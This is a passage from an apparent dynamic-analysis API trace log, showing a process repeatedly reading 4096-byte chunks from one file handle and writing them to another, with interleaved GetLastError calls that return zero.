lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.491] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.492] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.492] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.492] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.492] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.493] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.493] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.493] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.614] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.615] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] GetLastError () returned 0x0 [0103.615] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.615] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.615] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.616] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.616] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.616] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.617] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.617] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] GetLastError () returned 0x0 [0103.617] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.617] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.618] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.618] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.618] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.618] GetLastError () returned 0x0 [0103.618] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.619] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.619] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.619] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.619] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.619] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.619] GetLastError () returned 0x0 [0103.619] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.620] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.620] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.620] GetLastError () returned 0x0 [0103.621] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.621] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.621] GetLastError () returned 0x0 [0103.621] GetLastError () returned 0x0 [0103.621] GetLastError () returned 0x0 [0103.621] GetLastError () returned 0x0 [0103.621] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.621] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.621] GetLastError () returned 0x0 [0103.621] GetLastError () returned 0x0 [0103.621] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.621] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.622] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.623] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.624] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.625] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.626] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.626] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.626] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.627] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: 